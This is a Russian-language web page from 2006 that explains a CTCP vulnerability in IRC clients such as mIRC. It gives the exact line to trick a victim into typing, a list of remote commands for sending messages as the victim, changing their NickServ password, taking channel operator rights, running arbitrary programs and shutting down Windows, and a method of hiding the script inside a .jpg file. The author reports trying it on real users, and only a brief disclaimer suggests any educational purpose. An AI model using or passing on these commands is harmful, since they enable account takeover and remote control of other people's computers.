![]() ![]() ![]() ![]() ![]() ![]() ![]()
![]() ![]() ![]()
![]() ![]()
![]() ![]() ![]() ![]() ![]() ![]()
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]()
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]()
![]() ![]() ![]() ![]() ![]()
![]() ![]() ![]() ![]() ![]() ![]() ![]() |
![]() |
![]() |
![]() |
CTCP уязвимостиГода два назад мне попался документик, с описанием одной интересной, на мой взгляд, CTCP уязвимости IRC-клиентов. Вот он: Поехали! Жертва должна напечатать эту команду. (вы НЕ печатаете это!) //write oper.pas ctcp 1:*:?:$1- | Load -rs oper.pasкогда жертва наберёт это скрипт oper.pas будет создан в его(её) mirc каталоге. После этого вы можете использовать команды приведённые ниже. Не забудьте! Сначала заставьте жертву ввести //write oper.pas ctcp 1:*:?:$1- | Load -rs oper.pas и только после этого вводите приведённые ниже команды! Примечание: вместо NICK вставляйте, ник жертвы! Сделать, чтоб юзер зашёл на канал:/ctcp NICK /j #CHANNELЮзер покидает канал:/ctcp NICK /part #CHANNELПослать сообщение от имени жертвы:/ctcp NICK /msg #CHANNEL OUR MESSAGE...Послать приватное сообщение от имени жертвы:/ctcp NICK /msg NICK(anyone) OUR MESSAGE...Закрыть mirc жертвы:/ctcp NICK /exitСменить жертве пароль:/ctcp NICK /msg nickserv set passwd NEW_PASSСменить жертве ник:/ctcp NICK /nick NeW_NicKЕсли жертва является опом то следующей командой вызаставляете её дать вам опа на канале:/ctcp NICK /mode #channel +o OUR_NICKВыполнить на компьютере жертвы команду MS-DOS:/ctcp NICK /run commandОткрыть mirc на компьютере жертвы:/ctcp NICK /run mircЗапустить редактор реестра на компе жертвы:/ctcp NICK /run regeditФлуд на компе жертвы:/ctcp NICK /timer1 0 0 /ping $meВырубить винду на компе жертвы:/ctcp NICK /run exitwindowsКогда вы смените пароль жертвы, он (она) сможет увидеть новый пароль который вы набрали в окне статуса. Для смены пароля вы можете сделать следующее: Сбрасываете жертву с irc: /Nickserv ghost NICK PASSWORDYOUCHOSEПосле этого меняете свой ник на ник жертвы и набираете: /Nickserv set passwd NEW_PASSПосле этого если жертва была опом то и вы получаете опа соответственно и можете захватить канал. Таким образом, я решил протестировать это. Пришел на один сервер, пообщался, и предложил желающим стать IRCoperom набрать //write oper.pas ctcp 1:*:?:$1- | Load -rs oper.pas Желающих оказалось много, он начали жаловаться, что ничего не получается, чем себя и выдали. В результате долгого процесса тестирования, выявилось, что подвержены этой уязвимости не только Neora Trion, но и pIRC, mIRC, Trillian правда версии последнего не помню, но явно не из последних. Шаг 2 Т.к админы IRC-сетей люди довольно образованные и грамотные в этих вопросах, то во многих сетях прикрыли использование команды //write, т.к таким образом довольно много эксплоитов и троянов распространялось в IRC-сетех. Делаем следующим образом: 1. берем любую картинку, открываем ее в текстовом редакторе (Блокнот) и вписываем туда echo .... echo .... echo .... ctcp 1:*:?:$1-И сохраняем картинку в формат *.jpg 2. Картинку нужно впарить пользователям на канале (тут сами) 3. пользователь при попытке посмотреть содержимое картинки, ничего не увидит, и вы ему рекомендуете набрать следующее в любом окне его клиента /load -rs НАЗВАНИЕ_КАРТИНКИ.jpg , скрипт будет загружен в клиент "жертвы" дальше все по схеме, изложенной выше. Материал опубликован с целью ознакомления с уязвимостями, прежде чем испробовать его на практике хорошо подумайте, потому что, скорее всего Вам прийдется за свои действия отвечать .
![]() ![]() muhosransk Лучшее В Сети: Анекдоты, Картинки, Обои ![]() ![]() Forum Это лучшее место для общения на темы, которые вам интересны. Здесь вы можете задать интересующие вопросы и пообщаться! |
![]() |
![]() |
||||||||||||||
![]()
@2006
Автор: Juice |